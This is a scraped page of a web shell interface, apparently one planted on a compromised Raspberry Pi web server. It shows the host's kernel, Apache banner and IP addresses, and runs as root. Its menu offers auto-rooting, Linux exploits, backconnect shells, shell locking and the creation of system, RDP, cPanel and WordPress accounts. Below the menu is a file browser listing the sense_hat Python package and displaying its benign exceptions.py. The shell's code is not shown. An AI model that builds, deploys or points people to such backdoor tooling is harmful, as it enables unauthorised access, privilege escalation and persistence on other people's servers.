Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
sense_hat /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
349
B
-rw-r--r--
colour.py
11.71
KB
-rw-r--r--
exceptions.py
660
B
-rw-r--r--
sense_hat.py
26.14
KB
-rw-r--r--
sense_hat_text.png
908
B
-rw-r--r--
sense_hat_text.txt
92
B
-rw-r--r--
stick.py
10.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : exceptions.py
class SenseHatException(Exception): """ The base exception class for all SenseHat exceptions. """ fmt = 'An unspecified error occurred' def __init__(self, **kwargs): msg = self.fmt.format(**kwargs) Exception.__init__(self, msg) self.kwargs = kwargs class ColourSensorInitialisationError(SenseHatException): fmt = "Failed to initialise TCS34725 colour sensor. {explanation}" class InvalidGainError(SenseHatException): fmt = "Cannot set gain to '{gain}'. Values: {values}" class InvalidIntegrationCyclesError(SenseHatException): fmt = "Cannot set integration cycles to {integration_cycles} (1-256)"
Close